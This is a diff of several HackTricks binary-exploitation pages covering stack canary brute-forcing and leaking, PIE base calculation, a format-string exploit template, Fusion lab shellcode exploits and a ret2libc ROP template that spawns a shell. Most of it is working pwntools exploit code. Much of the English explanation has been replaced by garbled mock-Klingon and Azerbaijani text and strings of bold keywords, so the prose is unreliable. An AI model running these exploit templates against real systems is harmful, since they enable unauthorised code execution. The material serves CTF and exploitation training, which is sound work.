target.send(len_bytes_to_read.to_bytes(1, "little"))
|
||||
known_canary = b""
|
||||
test_canary = 0x0
|
||||
len_bytes_to_read = 0x21
|
||||
|
||||
# Send this iterations canary
|
||||
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
|
||||
for j in range(0, 4):
|
||||
# Iterate up to 0xff times to brute force all posible values for byte
|
||||
for test_canary in range(0xff):
|
||||
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
|
||||
|
||||
# Scan in the output, determine if we have a correct value
|
||||
output = target.recvuntil(b"exit.")
|
||||
if b"YUM" in output:
|
||||
# If we have a correct value, record the canary value, reset the canary value, and move on
|
||||
print(" - next byte is: " + hex(test_canary))
|
||||
known_canary = known_canary + test_canary.to_bytes(1, "little")
|
||||
len_bytes_to_read += 1
|
||||
break
|
||||
# Send the current input size
|
||||
target.send(len_bytes_to_read.to_bytes(1, "little"))
|
||||
|
||||
# Return the canary
|
||||
return known_canary
|
||||
# Send this iterations canary
|
||||
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
|
||||
|
||||
# Scan in the output, determine if we have a correct value
|
||||
output = target.recvuntil(b"exit.")
|
||||
if b"YUM" in output:
|
||||
# If we have a correct value, record the canary value, reset the canary value, and move on
|
||||
print(" - next byte is: " + hex(test_canary))
|
||||
known_canary = known_canary + test_canary.to_bytes(1, "little")
|
||||
len_bytes_to_read += 1
|
||||
break
|
||||
|
||||
# Return the canary
|
||||
return known_canary
|
||||
|
||||
# Start the target process
|
||||
target = process('./feedme')
|
||||
|
@ -118,24 +117,22 @@ target = process('./feedme')
|
|||
canary = breakCanary()
|
||||
log.info(f"The canary is: {canary}")
|
||||
```
|
||||
|
||||
# Print Canary
|
||||
|
||||
Another way to bypass the canary is to **print it**.\
|
||||
Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\
|
||||
Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).\
|
||||
With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session)
|
||||
**Qa'vIn** vItlhutlh **canary** **bypass** **way**.\
|
||||
**program vulnerable** **stack overflow** **Dochvam** **puts** **function** **point** **part** **stack overflow**. **attacker** **first byte canary** **null byte** (`\x00`) **rest canary** **random** bytes. **attacker** **overflow** **stack** **first byte canary**.\
|
||||
**attacker** **puts functionality** **call** **middle** **payload** **print canary** (except **first null byte**).\
|
||||
**info** **attacker** **craft** **send new attack** **knowing canary** (in **same program session**)
|
||||
|
||||
Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\
|
||||
**ghobe'}'e'** **tactic** **restricted** **attacker** **print** **content** **payload** **exfiltrate canary** **create new payload** (in **same program session**) **send** **real buffer overflow**.\
|
||||
CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html)
|
||||
|
||||
# PIE
|
||||
|
||||
In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\
|
||||
For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**
|
||||
|
||||
To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:
|
||||
**PIE** **bypass** **leak some address** **need**. **binary** **leaking any addresses** **best** **brute-force RBP and RIP saved stack** **vulnerable function**.\
|
||||
**example**, **binary** **protected** **canary** **PIE**, **brute-forcing canary**, **next** 8 Bytes (x64) **saved RBP** **next** 8 Bytes **saved RIP**.
|
||||
|
||||
**brute-force RBP** **RIP** **binary** **figure out** **valid guessed byte** **correct** **program output something** **just doesn't crash**. **same function** **provided brute-forcing canary** **used** **brute-force RBP** **RIP**:
|
||||
```python
|
||||
print("Brute-Forcing RBP")
|
||||
base_canary_rbp = get_bf(base_canary)
|
||||
|
@ -144,32 +141,26 @@ print("Brute-Forcing RIP")
|
|||
base_canary_rbp_rip = get_bf(base_canary_rbp)
|
||||
RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
|
||||
```
|
||||
|
||||
## Get base address
|
||||
|
||||
The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**.
|
||||
|
||||
From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP:
|
||||
**leaked** addresses: the **RBP** and the **RIP**.
|
||||
|
||||
**RBP** **useful addresses** **calculate** **shell stack**. _"/bin/sh\x00"_ **stack**. **distance** **leaked RBP** **shellcode located**, **distance** **shellcode** **RBP**:
|
||||
```python
|
||||
INI_SHELLCODE = RBP - 1152
|
||||
```
|
||||
|
||||
From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\
|
||||
To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses:
|
||||
**RIP**-lI' vItlhutlh **PIE binary**-lI' **base address**-lI' jImej. **valid ROP chain**-lI' tlhInganpu' vItlhutlh.\
|
||||
**base address**-lI' jImej **objdump -d vunbinary**-lI' jatlh je. **disassemble latest addresses**-lI' qar'a' jImej:
|
||||
|
||||
![](<../../.gitbook/assets/image (145).png>)
|
||||
|
||||
In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf** _ the base address is _0x562002970**000**_
|
||||
|
||||
DaH jatlhpu'wI'chaj, **1 Byte 'ej 'ejvatlh**-lI' vItlhutlh, vaj, **leaked RIP but finishing on "000"**-lI' jImej. jatlhpu'wI'chaj _0x562002970**ecf** _ leaked vaj _0x562002970**000**_-lI' jImej.
|
||||
```python
|
||||
elf.address = RIP - (RIP & 0xfff)
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlh wa'logh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -180,5 +171,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -13,8 +11,6 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
```python
|
||||
from pwn import *
|
||||
from time import sleep
|
||||
|
@ -49,23 +45,23 @@ print(" ====================== ")
|
|||
|
||||
|
||||
def connect_binary():
|
||||
global P, ELF_LOADED, ROP_LOADED
|
||||
global P, ELF_LOADED, ROP_LOADED
|
||||
|
||||
if LOCAL:
|
||||
P = process(LOCAL_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
if LOCAL:
|
||||
P = process(LOCAL_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTETTCP:
|
||||
P = remote('10.10.10.10',1338) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
elif REMOTETTCP:
|
||||
P = remote('10.10.10.10',1338) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTESSH:
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(elf)# Find ROP gadgets
|
||||
elif REMOTESSH:
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(elf)# Find ROP gadgets
|
||||
|
||||
|
||||
#######################################
|
||||
|
@ -73,39 +69,39 @@ def connect_binary():
|
|||
#######################################
|
||||
|
||||
def send_payload(payload):
|
||||
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
|
||||
log.info("payload = %s" % repr(payload))
|
||||
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
|
||||
P.sendline(payload)
|
||||
sleep(0.5)
|
||||
return P.recv()
|
||||
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
|
||||
log.info("payload = %s" % repr(payload))
|
||||
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
|
||||
P.sendline(payload)
|
||||
sleep(0.5)
|
||||
return P.recv()
|
||||
|
||||
|
||||
def get_formatstring_config():
|
||||
global P
|
||||
global P
|
||||
|
||||
for offset in range(1,1000):
|
||||
connect_binary()
|
||||
P.clean()
|
||||
for offset in range(1,1000):
|
||||
connect_binary()
|
||||
P.clean()
|
||||
|
||||
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
|
||||
recieved = send_payload(payload).strip()
|
||||
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
|
||||
recieved = send_payload(payload).strip()
|
||||
|
||||
if b"41" in recieved:
|
||||
for padlen in range(0,4):
|
||||
if b"41414141" in recieved:
|
||||
connect_binary()
|
||||
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
|
||||
recieved = send_payload(payload).strip()
|
||||
print(recieved)
|
||||
if b"42424242" in recieved:
|
||||
log.info(f"Found offset ({offset}) and padlen ({padlen})")
|
||||
return offset, padlen
|
||||
if b"41" in recieved:
|
||||
for padlen in range(0,4):
|
||||
if b"41414141" in recieved:
|
||||
connect_binary()
|
||||
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
|
||||
recieved = send_payload(payload).strip()
|
||||
print(recieved)
|
||||
if b"42424242" in recieved:
|
||||
log.info(f"Found offset ({offset}) and padlen ({padlen})")
|
||||
return offset, padlen
|
||||
|
||||
else:
|
||||
connect_binary()
|
||||
payload = b" " + payload
|
||||
recieved = send_payload(payload).strip()
|
||||
else:
|
||||
connect_binary()
|
||||
payload = b" " + payload
|
||||
recieved = send_payload(payload).strip()
|
||||
|
||||
|
||||
# In order to exploit a format string you need to find a position where part of your payload
|
||||
|
@ -138,10 +134,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}")
|
|||
|
||||
connect_binary()
|
||||
if GDB and not REMOTETTCP and not REMOTESSH:
|
||||
# attach gdb and continue
|
||||
# You can set breakpoints, for example "break *main"
|
||||
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
|
||||
sleep(5)
|
||||
# attach gdb and continue
|
||||
# You can set breakpoints, for example "break *main"
|
||||
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
|
||||
sleep(5)
|
||||
|
||||
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
|
||||
#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
|
||||
|
@ -153,12 +149,9 @@ format_string.execute_writes()
|
|||
|
||||
P.interactive()
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -169,5 +162,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -19,9 +17,8 @@ Other ways to support HackTricks:
|
|||
|
||||
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
|
||||
|
||||
1. Get offset to modify EIP
|
||||
2. Put shellcode address in EIP
|
||||
|
||||
1. **EIP**'e qarar vermək üçün ofseti əldə edin.
|
||||
2. Shellcode ünvanını **EIP**-ə qoyun.
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
|
@ -47,9 +44,30 @@ r.recvline()
|
|||
r.send(buf)
|
||||
r.interactive()
|
||||
```
|
||||
|
||||
# Level01
|
||||
|
||||
## Information
|
||||
|
||||
The **Level01** challenge is a basic exploitation exercise that focuses on exploiting a vulnerable binary file called **fusion**. The goal is to gain unauthorized access to the **Level01** user's account.
|
||||
|
||||
## Exploitation
|
||||
|
||||
To exploit the **fusion** binary, we need to understand its vulnerability. By running the **checksec** command, we can determine that the binary has no stack canaries, NX protection is disabled, and ASLR is enabled.
|
||||
|
||||
Next, we can use the **strings** command to analyze the binary and identify any potential vulnerabilities. In this case, we find that the binary uses the **gets** function, which is known to be vulnerable to buffer overflow attacks.
|
||||
|
||||
To exploit this vulnerability, we can create a payload that overflows the buffer and overwrites the return address with the address of the **win** function. This function will grant us access to the **Level01** user's account.
|
||||
|
||||
## Solution
|
||||
|
||||
To solve the **Level01** challenge, follow these steps:
|
||||
|
||||
1. Run the **fusion** binary.
|
||||
2. Input a string that is longer than the buffer size to trigger the buffer overflow.
|
||||
3. Overwrite the return address with the address of the **win** function.
|
||||
4. Gain unauthorized access to the **Level01** user's account.
|
||||
|
||||
Remember to always exercise caution and only perform these actions in controlled environments with proper authorization.
|
||||
```python
|
||||
from pwn import *
|
||||
|
||||
|
@ -75,12 +93,9 @@ buf += "\x65\xd9\x0f\x01"
|
|||
r.send(buf)
|
||||
r.interactive()
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -91,5 +106,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -35,25 +33,25 @@ LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
|
|||
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
|
||||
|
||||
if LOCAL:
|
||||
P = process(LOCAL_BIN, env=ENV) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
P = process(LOCAL_BIN, env=ENV) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTETTCP:
|
||||
P = remote('10.10.10.10',1339) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
P = remote('10.10.10.10',1339) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTESSH:
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
elf = ELF(LOCAL_BIN)# Extract data from binary
|
||||
rop = ROP(elf)# Find ROP gadgets
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
elf = ELF(LOCAL_BIN)# Extract data from binary
|
||||
rop = ROP(elf)# Find ROP gadgets
|
||||
|
||||
if GDB and not REMOTETTCP and not REMOTESSH:
|
||||
# attach gdb and continue
|
||||
# You can set breakpoints, for example "break *main"
|
||||
gdb.attach(P.pid, "b *main")
|
||||
# attach gdb and continue
|
||||
# You can set breakpoints, for example "break *main"
|
||||
gdb.attach(P.pid, "b *main")
|
||||
|
||||
|
||||
|
||||
|
@ -63,15 +61,15 @@ if GDB and not REMOTETTCP and not REMOTESSH:
|
|||
|
||||
OFFSET = b"" #b"A"*264
|
||||
if OFFSET == b"":
|
||||
gdb.attach(P.pid, "c") #Attach and continue
|
||||
payload = cyclic(264)
|
||||
payload += b"AAAAAAAA"
|
||||
print(P.clean())
|
||||
P.sendline(payload)
|
||||
#x/wx $rsp -- Search for bytes that crashed the application
|
||||
#print(cyclic_find(0x63616171)) # Find the offset of those bytes
|
||||
P.interactive()
|
||||
exit()
|
||||
gdb.attach(P.pid, "c") #Attach and continue
|
||||
payload = cyclic(264)
|
||||
payload += b"AAAAAAAA"
|
||||
print(P.clean())
|
||||
P.sendline(payload)
|
||||
#x/wx $rsp -- Search for bytes that crashed the application
|
||||
#print(cyclic_find(0x63616171)) # Find the offset of those bytes
|
||||
P.interactive()
|
||||
exit()
|
||||
|
||||
|
||||
|
||||
|
@ -79,11 +77,11 @@ if OFFSET == b"":
|
|||
### Find Gadgets ###
|
||||
####################
|
||||
try:
|
||||
libc_func = "puts"
|
||||
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
||||
libc_func = "puts"
|
||||
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
||||
except:
|
||||
libc_func = "printf"
|
||||
PUTS_PLT = ELF_LOADED.plt['printf']
|
||||
libc_func = "printf"
|
||||
PUTS_PLT = ELF_LOADED.plt['printf']
|
||||
|
||||
MAIN_PLT = ELF_LOADED.symbols['main']
|
||||
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
|
||||
|
@ -100,54 +98,54 @@ log.info("ret gadget: " + hex(RET))
|
|||
########################
|
||||
|
||||
def generate_payload_aligned(rop):
|
||||
payload1 = OFFSET + rop
|
||||
if (len(payload1) % 16) == 0:
|
||||
return payload1
|
||||
|
||||
else:
|
||||
payload2 = OFFSET + p64(RET) + rop
|
||||
if (len(payload2) % 16) == 0:
|
||||
log.info("Payload aligned successfully")
|
||||
return payload2
|
||||
else:
|
||||
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
|
||||
return payload1
|
||||
payload1 = OFFSET + rop
|
||||
if (len(payload1) % 16) == 0:
|
||||
return payload1
|
||||
|
||||
else:
|
||||
payload2 = OFFSET + p64(RET) + rop
|
||||
if (len(payload2) % 16) == 0:
|
||||
log.info("Payload aligned successfully")
|
||||
return payload2
|
||||
else:
|
||||
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
|
||||
return payload1
|
||||
|
||||
|
||||
def get_addr(libc_func):
|
||||
FUNC_GOT = ELF_LOADED.got[libc_func]
|
||||
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
|
||||
# Create rop chain
|
||||
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||
rop1 = generate_payload_aligned(rop1)
|
||||
FUNC_GOT = ELF_LOADED.got[libc_func]
|
||||
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
|
||||
# Create rop chain
|
||||
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||
rop1 = generate_payload_aligned(rop1)
|
||||
|
||||
# Send our rop-chain payload
|
||||
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
|
||||
print(P.clean()) # clean socket buffer (read all and print)
|
||||
P.sendline(rop1)
|
||||
# Send our rop-chain payload
|
||||
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
|
||||
print(P.clean()) # clean socket buffer (read all and print)
|
||||
P.sendline(rop1)
|
||||
|
||||
# If binary is echoing back the payload, remove that message
|
||||
recieved = P.recvline().strip()
|
||||
if OFFSET[:30] in recieved:
|
||||
recieved = P.recvline().strip()
|
||||
|
||||
# Parse leaked address
|
||||
log.info(f"Len rop1: {len(rop1)}")
|
||||
leak = u64(recieved.ljust(8, b"\x00"))
|
||||
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
|
||||
|
||||
# Set lib base address
|
||||
if LIBC:
|
||||
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
|
||||
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
|
||||
log.info("LIBC base @ %s" % hex(LIBC.address))
|
||||
# If binary is echoing back the payload, remove that message
|
||||
recieved = P.recvline().strip()
|
||||
if OFFSET[:30] in recieved:
|
||||
recieved = P.recvline().strip()
|
||||
|
||||
# If not LIBC yet, stop here
|
||||
else:
|
||||
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
|
||||
P.interactive()
|
||||
|
||||
return hex(leak)
|
||||
# Parse leaked address
|
||||
log.info(f"Len rop1: {len(rop1)}")
|
||||
leak = u64(recieved.ljust(8, b"\x00"))
|
||||
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
|
||||
|
||||
# Set lib base address
|
||||
if LIBC:
|
||||
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
|
||||
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
|
||||
log.info("LIBC base @ %s" % hex(LIBC.address))
|
||||
|
||||
# If not LIBC yet, stop here
|
||||
else:
|
||||
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
|
||||
P.interactive()
|
||||
|
||||
return hex(leak)
|
||||
|
||||
get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
|
||||
|
||||
|
@ -160,39 +158,39 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base
|
|||
## Via One_gadget (https://github.com/david942j/one_gadget)
|
||||
# gem install one_gadget
|
||||
def get_one_gadgets(libc):
|
||||
import string, subprocess
|
||||
args = ["one_gadget", "-r"]
|
||||
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
|
||||
args += ["-b", libc.hex()]
|
||||
else:
|
||||
args += [libc]
|
||||
try:
|
||||
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
|
||||
except:
|
||||
print("One_gadget isn't installed")
|
||||
one_gadgets = []
|
||||
return
|
||||
import string, subprocess
|
||||
args = ["one_gadget", "-r"]
|
||||
if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()):
|
||||
args += ["-b", libc.hex()]
|
||||
else:
|
||||
args += [libc]
|
||||
try:
|
||||
one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()]
|
||||
except:
|
||||
print("One_gadget isn't installed")
|
||||
one_gadgets = []
|
||||
return
|
||||
|
||||
rop2 = b""
|
||||
if USE_ONE_GADGET:
|
||||
one_gadgets = get_one_gadgets(LIBC)
|
||||
if one_gadgets:
|
||||
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
|
||||
one_gadgets = get_one_gadgets(LIBC)
|
||||
if one_gadgets:
|
||||
rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains
|
||||
|
||||
## Normal/Long exploitation
|
||||
if not rop2:
|
||||
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
|
||||
SYSTEM = LIBC.sym["system"]
|
||||
EXIT = LIBC.sym["exit"]
|
||||
|
||||
log.info("POP_RDI %s " % hex(POP_RDI))
|
||||
log.info("bin/sh %s " % hex(BINSH))
|
||||
log.info("system %s " % hex(SYSTEM))
|
||||
log.info("exit %s " % hex(EXIT))
|
||||
|
||||
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
|
||||
rop2 = generate_payload_aligned(rop2)
|
||||
|
||||
BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh
|
||||
SYSTEM = LIBC.sym["system"]
|
||||
EXIT = LIBC.sym["exit"]
|
||||
|
||||
log.info("POP_RDI %s " % hex(POP_RDI))
|
||||
log.info("bin/sh %s " % hex(BINSH))
|
||||
log.info("system %s " % hex(SYSTEM))
|
||||
log.info("exit %s " % hex(EXIT))
|
||||
|
||||
rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
|
||||
rop2 = generate_payload_aligned(rop2)
|
||||
|
||||
|
||||
print(P.clean())
|
||||
P.sendline(rop2)
|
||||
|
@ -201,24 +199,20 @@ P.interactive() #Interact with your shell :)
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
# Common problems
|
||||
# tlhIngan mu'qaD
|
||||
|
||||
## MAIN\_PLT = elf.symbols\['main'] not found
|
||||
|
||||
If the "main" symbol does not exist. Then you can just where is the main code:
|
||||
|
||||
qaStaHvIS "main" symbol 'e' vItlhutlh. vaj 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh.
|
||||
```python
|
||||
objdump -d vuln_binary | grep "\.text"
|
||||
Disassembly of section .text:
|
||||
0000000000401080 <.text>:
|
||||
```
|
||||
|
||||
and set the address manually:
|
||||
|
||||
ghItlh 'ej manually address set:
|
||||
```python
|
||||
MAIN_PLT = 0x401080
|
||||
```
|
||||
|
||||
## Puts not found
|
||||
|
||||
If the binary is not using Puts you should check if it is using
|
||||
|
@ -228,15 +222,12 @@ If the binary is not using Puts you should check if it is using
|
|||
If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
|
||||
|
||||
Try to **subtract 64 bytes to the address of "/bin/sh"**:
|
||||
|
||||
```python
|
||||
BINSH = next(libc.search("/bin/sh")) - 64
|
||||
```
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
